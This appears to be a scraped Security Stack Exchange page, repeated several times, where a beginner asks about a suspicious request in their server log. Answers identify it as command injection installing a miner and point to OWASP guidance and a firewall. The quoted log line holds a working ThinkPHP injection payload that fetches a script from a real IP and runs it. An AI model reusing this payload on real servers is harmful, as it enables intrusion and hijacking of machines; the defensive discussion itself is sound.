Sfdwhf

Early credit roll before the end of the film

Is using an 'empty' metaphor considered bad style?

A Missing Symbol for This Logo

If I delete my router's history can my ISP still provide it to my parents?

What is a good reason for every spaceship to carry a weapon on board?

Eww, those bytes are gross

Is a new Boolean field better than a null reference when a value can be meaningfully absent?

Can a Pact of the Blade warlock use the correct existing pact magic weapon so it functions as a "Returning" weapon?

Using only 1s, make 29 with the minimum number of digits

Comparing two arrays of unequal length

Positioning node within rectangle Tikz

use of 4/2 chord more compelling than root position?

Why did Democrats in the Senate oppose the Born-Alive Abortion Survivors Protection Act (2019 S.130)?

Intern applicant asking for compensation equivalent to that of permanent employee

How can my powered armor quickly replace its ceramic plates?

Pythonのiterable

How should I handle players who ignore the session zero agreement?

Why avoid shared user accounts?

Can I make estimated tax payments instead of withholding from my paycheck?

What are career options for big-picture thinkers with no experience?

How old is the day of 24 equal hours?

Do theoretical physics suggest that gravity is the exchange of gravitons or deformation/bending of spacetime?

Can a person refuse a presidential pardon?

Has any human ever had the choice to leave Earth permanently?

How to prevent users from executing commands through browser URL

How to disable Firewire in OpenBSD/Linux to prevent attacks through Firewire?Executing arbitrary commands through iptables-restore inputTracking checkins from generic usersHow to prevent future attacks from Trojan.Agent.Linux.A?Unprivileged user sends commands to init (systemd), how could he get root?How to manually detect and remove Linux.BackDoor.FakeFile.1 from linux system through the command line?How to prevent documents from being stolen via Linux live CDHow to prevent Tails OS from accessing hard drive?From a security standpoint is there anything wrong with running repetitive putty commands from the command line?Prevent apps from having full access to user files

3

1

I have very little experience with security (Still learning) however was combing through my logs and I noticed the following request:

"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

Now first of all this made no sense to me with the exception of chmod 777 which tells me someone was trying to change my file permissions.

My question is what kind of attack is this and what steps can I take to prevent it?

linux

share|improve this question

asked 2 hours ago

user3718908user3718908

1162

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

add a comment | 

3

1

I have very little experience with security (Still learning) however was combing through my logs and I noticed the following request:

"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

Now first of all this made no sense to me with the exception of chmod 777 which tells me someone was trying to change my file permissions.

My question is what kind of attack is this and what steps can I take to prevent it?

linux

share|improve this question

asked 2 hours ago

user3718908user3718908

1162

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

add a comment | 

I have very little experience with security (Still learning) however was combing through my logs and I noticed the following request:

"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

Now first of all this made no sense to me with the exception of chmod 777 which tells me someone was trying to change my file permissions.

My question is what kind of attack is this and what steps can I take to prevent it?

linux

share|improve this question

asked 2 hours ago

user3718908user3718908

1162

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

share|improve this question

asked 2 hours ago

user3718908user3718908

1162

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

share|improve this question

asked 2 hours ago

user3718908user3718908

1162

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

asked 2 hours ago

user3718908user3718908

1162

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

asked 2 hours ago

user3718908user3718908

1162

2 Answers
2

active

oldest

votes

2

It's a command injection attack in which :

the goal is execution of arbitrary commands on the host
operating system via a vulnerable application. Command injection
attacks are possible when an application passes unsafe user supplied
data (forms, cookies, HTTP headers etc.) to a system shell. In this
attack, the attacker-supplied operating system commands are usually
executed with the privileges of the vulnerable application. Command
injection attacks are possible largely due to insufficient input
validation.

There are many strategies to mitigate or to avoid this kind of attacks you can find somes here and have a look at this cheatsheet from OWASP.

share|improve this answer

answered 1 hour ago

Soufiane TahiriSoufiane Tahiri

1,736417

add a comment | 

2

As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run and then execute it.
The script in this case is a bitcoin miner.

The recommendations in the OWASP guide that Soufiane should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used which will block requests like these before they reach your server process.

share|improve this answer

answered 1 hour ago

VeyfVeyf

211

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

add a comment | 

Your Answer

StackExchange.ready(function() {
var channelOptions = {
tags: "".split(" "),
id: "162"
};
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function() {
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled) {
StackExchange.using("snippets", function() {
createEditor();
});
}
else {
createEditor();
}
});

function createEditor() {
StackExchange.prepareEditor({
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader: {
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
},
noCode: true, onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
});


}
});

user3718908 is a new contributor. Be nice, and check out our Code of Conduct.

draft saved

draft discarded

Sign up or log in

StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});

Sign up using Google

Sign up using Facebook

Sign up using Email and Password

Post as a guest

Name

Email

Required, but never shown

StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f204459%2fhow-to-prevent-users-from-executing-commands-through-browser-url%23new-answer', 'question_page');
}
);

Post as a guest

Name

Email

Required, but never shown

2

It's a command injection attack in which :

the goal is execution of arbitrary commands on the host
operating system via a vulnerable application. Command injection
attacks are possible when an application passes unsafe user supplied
data (forms, cookies, HTTP headers etc.) to a system shell. In this
attack, the attacker-supplied operating system commands are usually
executed with the privileges of the vulnerable application. Command
injection attacks are possible largely due to insufficient input
validation.

There are many strategies to mitigate or to avoid this kind of attacks you can find somes here and have a look at this cheatsheet from OWASP.

share|improve this answer

answered 1 hour ago

Soufiane TahiriSoufiane Tahiri

1,736417

add a comment | 

2

It's a command injection attack in which :

the goal is execution of arbitrary commands on the host
operating system via a vulnerable application. Command injection
attacks are possible when an application passes unsafe user supplied
data (forms, cookies, HTTP headers etc.) to a system shell. In this
attack, the attacker-supplied operating system commands are usually
executed with the privileges of the vulnerable application. Command
injection attacks are possible largely due to insufficient input
validation.

There are many strategies to mitigate or to avoid this kind of attacks you can find somes here and have a look at this cheatsheet from OWASP.

share|improve this answer

answered 1 hour ago

Soufiane TahiriSoufiane Tahiri

1,736417

add a comment | 

It's a command injection attack in which :

the goal is execution of arbitrary commands on the host
operating system via a vulnerable application. Command injection
attacks are possible when an application passes unsafe user supplied
data (forms, cookies, HTTP headers etc.) to a system shell. In this
attack, the attacker-supplied operating system commands are usually
executed with the privileges of the vulnerable application. Command
injection attacks are possible largely due to insufficient input
validation.

There are many strategies to mitigate or to avoid this kind of attacks you can find somes here and have a look at this cheatsheet from OWASP.

share|improve this answer

answered 1 hour ago

Soufiane TahiriSoufiane Tahiri

1,736417

share|improve this answer

answered 1 hour ago

Soufiane TahiriSoufiane Tahiri

1,736417

answered 1 hour ago

Soufiane TahiriSoufiane Tahiri

1,736417

answered 1 hour ago

Soufiane TahiriSoufiane Tahiri

1,736417

2

As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run and then execute it.
The script in this case is a bitcoin miner.

The recommendations in the OWASP guide that Soufiane should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used which will block requests like these before they reach your server process.

share|improve this answer

answered 1 hour ago

VeyfVeyf

211

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

add a comment | 

2

As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run and then execute it.
The script in this case is a bitcoin miner.

The recommendations in the OWASP guide that Soufiane should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used which will block requests like these before they reach your server process.

share|improve this answer

answered 1 hour ago

VeyfVeyf

211

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

add a comment | 

As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run and then execute it.
The script in this case is a bitcoin miner.

The recommendations in the OWASP guide that Soufiane should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used which will block requests like these before they reach your server process.

share|improve this answer

answered 1 hour ago

VeyfVeyf

211

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

share|improve this answer

answered 1 hour ago

VeyfVeyf

211

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

answered 1 hour ago

VeyfVeyf

211

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

answered 1 hour ago

VeyfVeyf

211